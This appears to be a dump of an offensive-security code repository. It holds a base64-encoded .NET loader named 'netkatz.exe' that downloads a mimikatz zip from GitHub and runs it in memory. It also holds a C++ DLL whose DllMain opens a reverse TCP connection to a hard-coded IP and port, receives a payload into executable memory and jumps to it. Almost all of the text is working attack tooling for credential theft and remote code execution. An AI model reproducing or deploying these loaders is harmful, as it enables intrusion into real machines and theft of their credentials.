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N0b3IAZG9zSGVhZGVyAGZpbGVIZWFkZXIAb3B0aW9uYWxIZWFkZXIzMgBvcHRpb25hbEhlYWRlcjY0AGltYWdlU2VjdGlvbkhlYWRlcnMAcmF3Ynl0ZXMAQmluYXJ5UmVhZGVyAEZyb21CaW5hcnlSZWFkZXIAVABnZXRfSXMzMkJpdEhlYWRlcgBnZXRfRmlsZUhlYWRlcgBnZXRfT3B0aW9uYWxIZWFkZXIzMgBnZXRfT3B0aW9uYWxIZWFkZXI2NABnZXRfSW1hZ2VTZWN0aW9uSGVhZGVycwBnZXRfUmF3Qnl0ZXMASXMzMkJpdEhlYWRlcgBGaWxlSGVhZGVyAE9wdGlvbmFsSGVhZGVyMzIAT3B0aW9uYWxIZWFkZXI2NABJbWFnZVNlY3Rpb25IZWFkZXJzAFJhd0J5dGVzAGVfbWFnaWMAZV9jYmxwAGVfY3AAZV9jcmxjAGVfY3BhcmhkcgBlX21pbmFsbG9jAGVfbWF4YWxsb2MAZV9zcwBlX3NwAGVfY3N1bQBlX2lwAGVfY3MAZV9sZmFybGMAZV9vdm5vAGVfcmVzXzAAZV9yZXNfMQBlX3Jlc18yAGVfcmVzXzMAZV9vZW1pZABlX29lbWluZm8AZV9yZXMyXzAAZV9yZXMyXzEAZV9yZXMyXzIAZV9yZXMyXzMAZV9yZXMyXzQAZV9yZXMyXzUAZV9yZXMyXzYAZV9yZXMyXzcAZV9yZXMyXzgAZV9yZXMyXzkAZV9sZmFuZXcAVmlydHVhbEFkZHJlc3MAU2l6ZQBNYWdpYwBNYWpvckxpbmtlclZlcnNpb24ATWlub3JMaW5rZXJWZXJzaW9uAFNpemVPZkNvZGUAU2l6ZU9mSW5pdGlhbGl6ZWREYXRhAFNpemVPZlVuaW5pdGlhbGl6ZWREYXRhAEFkZHJlc3NPZkVudHJ5UG9pbnQAQmFzZU9mQ29kZQBCYXNlT2ZEYXRhAEltYWdlQmFzZQBTZWN0aW9uQWxpZ25tZW50AEZpbGVBbGlnbm1lbnQATWFqb3JPcGVyYXRpbmdTeXN0ZW1WZXJzaW9uAE1pbm9yT3BlcmF0aW5nU3lzdGVtVmVyc2lvbgBNYWpvckltYWdlVmVyc2lvbgBNaW5vckltYWdlVmVyc2lvbgBNYWpvclN1YnN5c3RlbVZlcnNpb24ATWlub3JTdWJzeXN0ZW1WZXJzaW9uAFdpbjMyVmVyc2lvblZhbHVlAFNpemVPZkltYWdlAFNpemVPZkhlYWRlcnMAQ2hlY2tTdW0AU3Vic3lzdGVtAERsbENoYXJhY3RlcmlzdGljcwBTaXplT2ZTdGFja1Jlc2VydmUAU2l6ZU9mU3RhY2tDb21taXQAU2l6ZU9mSGVhcFJlc2VydmUAU2l6ZU9mSGVhcENvbW1pdABMb2FkZXJGbGFncwBOdW1iZXJPZlJ2YUFuZFNpemVzAEV4cG9ydFRhYmxlAEltcG9ydFRhYmxlAFJlc291cmNlVGFibGUARXhjZXB0aW9uVGFibGUAQ2VydGlmaWNhdGVUYWJsZQBCYXNlUmVsb2NhdGlvblRhYmxlAERlYnVnAEFyY2hpdGVjdHVyZQBHbG9iYWxQdHIAVExTVGFibGUATG9hZENvbmZpZ1RhYmxlAEJvdW5kSW1wb3J0AElBVABEZWxheUltcG9ydERlc2NyaXB0b3IAQ0xSUnVudGltZUhlYWRlcgBSZXNlcnZlZABNYWNoaW5lAE51bWJlck9mU2VjdGlvbnMAVGltZURhdGVTdGFtcABQb2ludGVyVG9TeW1ib2xUYWJsZQBOdW1iZXJPZlN5bWJvbHMAU2l6ZU9mT3B0aW9uYWxIZWFkZXIAQ2hhcmFjdGVyaXN0aWNzAE5hbWUAVmlydHVhbFNpemUAU2l6ZU9mUmF3RGF0YQBQb2ludGVyVG9SYXdEYXRhAFBvaW50ZXJUb1JlbG9jYXRpb25zAFBvaW50ZXJUb0xpbmVudW1iZXJzAE51bWJlck9mUmVsb2NhdGlvbnMATnVtYmVyT2ZMaW5lbnVtYmVycwBnZXRfU2VjdGlvbgBTZWN0aW9uAFZpcnR1YWxBZHJlc3MAU2l6ZU9mQmxvY2sAdmFsdWVfXwBTdHViAE1FTV9DT01NSVQATUVNX1JFU0VSVkUAUEFHRV9FWEVDVVRFX1JFQURXUklURQBQQUdFX1JFQURXUklURQBWaXJ0dWFsQWxsb2MATG9hZExpYnJhcnkAR2V0UHJvY0FkZHJlc3MAQ3JlYXRlVGhyZWFkAFdhaXRGb3JTaW5nbGVPYmplY3QAT3JpZ2luYWxGaXJzdFRodW5rAEZvcndhcmRlckNoYWluAEZpcnN0VGh1bmsAaW5wdXQAZmlsZVBhdGgAZmlsZUJ5dGVzAHJlYWRlcgBscFN0YXJ0QWRkcgBzaXplAGZsQWxsb2NhdGlvblR5cGUAZmxQcm90ZWN0AGxwRmlsZU5hbWUAaE1vZHVsZQBwcm9jTmFtZQBscFRocmVhZEF0dHJpYnV0ZXMAZHdTdGFja1NpemUAbHBTdGFydEFkZHJlc3MAcGFyYW0AZHdDcmVhdGlvbkZsYWdzAGxwVGhyZWFkSWQAaEhhbmRsZQBkd01pbGxpc2Vjb25kcwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAFNlY3VyaXR5QWN0aW9uAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBuZXRrYXR6AEJ5dGUATWVtb3J5U3RyZWFtAFdyaXRlAFJlYWQAVG9BcnJheQBJRGlzcG9zYWJsZQBEaXNwb3NlAFN5c3RlbS5OZXQAV2ViQ2xpZW50AERvd25sb2FkRGF0YQBTeXN0ZW0uSU8uQ29tcHJlc3Npb24AWmlwQXJjaGl2ZQBTeXN0ZW0uQ29sbGVjdGlvbnMuT2JqZWN0TW9kZWwAUmVhZE9ubHlDb2xsZWN0aW9uYDEAWmlwQXJjaGl2ZUVudHJ5AGdldF9FbnRyaWVzAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAElFbnVtZXJhdG9yYDEAR2V0RW51bWVyYXRvcgBnZXRfQ3VycmVudABnZXRfRnVsbE5hbWUAU3RyaW5nAG9wX0VxdWFsaXR5AENvbnNvbGUAV3JpdGVMaW5lAE9wZW4AU3lzdGVtLkNvbGxlY3Rpb25zAElFbnVtZXJhdG9yAE1vdmVOZXh0AEV4Y2VwdGlvbgBnZXRfTWVzc2FnZQBnZXRfSW5uZXJFeGNlcHRpb24AVUludDY0AFRvU3RyaW5nAEludFB0cgBaZXJvAFVJbnQzMgBBZGQAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1hcnNoYWwAQ29weQBUb0ludDY0AEludDY0AFR5cGUAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAUHRyVG9TdHJ1Y3R1cmUAU2l6ZU9mAFJlYWRJbnQxNgBSZWFkSW50NjQAV3JpdGVJbnQ2NABSZWFkSW50MzIAUHRyVG9TdHJpbmdBbnNpAG9wX0V4cGxpY2l0AEZpbGVTdHJlYW0ARmlsZU1vZGUARmlsZUFjY2VzcwBTZWVrT3JpZ2luAFNlZWsAUmVhZFVJbnQzMgBGaWxlAFJlYWRBbGxCeXRlcwBSZWFkQnl0ZXMAR0NIYW5kbGUAR0NIYW5kbGVUeXBlAEFsbG9jAEFkZHJPZlBpbm5lZE9iamVjdABGcmVlAFN0cnVjdExheW91dEF0dHJpYnV0ZQBMYXlvdXRLaW5kAEZpZWxkT2Zmc2V0QXR0cmlidXRlAE1hcnNoYWxBc0F0dHJpYnV0ZQBVbm1hbmFnZWRUeXBlAEZsYWdzQXR0cmlidXRlAERsbEltcG9ydEF0dHJpYnV0ZQBrZXJuZWwzMgBrZXJuZWwzMi5kbGwALmNjdG9yAFN5c3RlbS5TZWN1cml0eQBVbnZlcmlmaWFibGVDb2RlQXR0cmlidXRlAAAAAACAtWgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZwBlAG4AdABpAGwAawBpAHcAaQAvAG0AaQBtAGkAawBhAHQAegAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvADIALgAxAC4AMAAtADIAMAAxADYAMQAwADAANQAvAG0AaQBtAGkAawBhAHQAegBfAHQAcgB1AG4AawAuAHoAaQBwAAEheAA2ADQALwBtAGkAbQBpAGsAYQB0AHoALgBlAHgAZQAAI0QAbwB3AG4AbABvAGEAZABlAGQAIABMAGEAdABlAHMAdAAAOVAAcgBlAGYAZQByAHIAZQBkACAATABvAGEAZAAgAEEAZABkAHIAZQBzAHMAIAA9ACAAewAwAH0AAAVYADQAAD1BAGwAbABvAGMAYQB0AGUAZAAgAFMAcABhAGMAZQAgAEYAbwByACAAewAwAH0AIABhAHQAIAB7ADEAfQAANVMAZQBjAHQAaQBvAG4AIAB7ADAAfQAsACAAQwBvAHAAaQBlAGQAIABUAG8AIAB7ADEAfQAAF0QAZQBsAHQAYQAgAD0AIAB7ADAAfQAAAQAVTABvAG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x5Pg0KAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAADAAAAEA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA== 2 | -------------------------------------------------------------------------------- /messagebox.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/messagebox.dll -------------------------------------------------------------------------------- /meterpreter_reverse_tcp.cpp: -------------------------------------------------------------------------------- 1 | #include "Windows.h" 2 | #include 3 | #include 4 | 5 | #pragma comment(lib,"WS2_32.lib") 6 | 7 | int reverse_tcp() 8 | { 9 | WSADATA wsData; 10 | if(WSAStartup(MAKEWORD(2,2),&wsData)) 11 | { 12 | printf("WSAStartp fail.\n"); 13 | return 0; 14 | } 15 | 16 | SOCKET sock = WSASocket(AF_INET,SOCK_STREAM,0,0,0,0); 17 | SOCKADDR_IN server; 18 | ZeroMemory(&server,sizeof(SOCKADDR_IN)); 19 | server.sin_family = AF_INET; 20 | server.sin_addr.s_addr = inet_addr("192.168.127.132"); //server ip 21 | server.sin_port = htons(8888); //server port 22 | if(SOCKET_ERROR == connect(sock,(SOCKADDR*)&server,sizeof(server))) 23 | { 24 | printf("connect to server fail.\n"); 25 | closesocket(sock); 26 | WSACleanup(); 27 | return 0; 28 | } 29 | 30 | u_int payloadLen; 31 | if (recv(sock,(char*)&payloadLen,sizeof(payloadLen),0) != sizeof(payloadLen)) 32 | { 33 | printf("recv error\n"); 34 | closesocket(sock); 35 | WSACleanup(); 36 | return 0; 37 | } 38 | 39 | char* orig_buffer = (char*)VirtualAlloc(NULL,payloadLen,MEM_COMMIT,PAGE_EXECUTE_READWRITE); 40 | char* buffer = orig_buffer; 41 | int ret = 0; 42 | do 43 | { 44 | ret = recv(sock,buffer,payloadLen,0); 45 | buffer += ret; 46 | payloadLen -= ret; 47 | } while (ret > 0 && payloadLen > 0); 48 | 49 | 50 | __asm 51 | { 52 | mov edi,sock; 53 | jmp orig_buffer; 54 | } 55 | 56 | VirtualFree(orig_buffer,0,MEM_RELEASE); 57 | 58 | 59 | } 60 | 61 | BOOL APIENTRY DllMain( HMODULE hModule, 62 | DWORD ul_reason_for_call, 63 | LPVOID lpReserved 64 | ) 65 | { 66 | switch (ul_reason_for_call) 67 | { 68 | case DLL_PROCESS_ATTACH: 69 | reverse_tcp(); 70 | case DLL_THREAD_ATTACH: 71 | case DLL_THREAD_DETACH: 72 | case DLL_PROCESS_DETACH: 73 | break; 74 | } 75 | return TRUE; 76 | } 77 | -------------------------------------------------------------------------------- /msg.dll: -------------------------------------------------------------------------------- 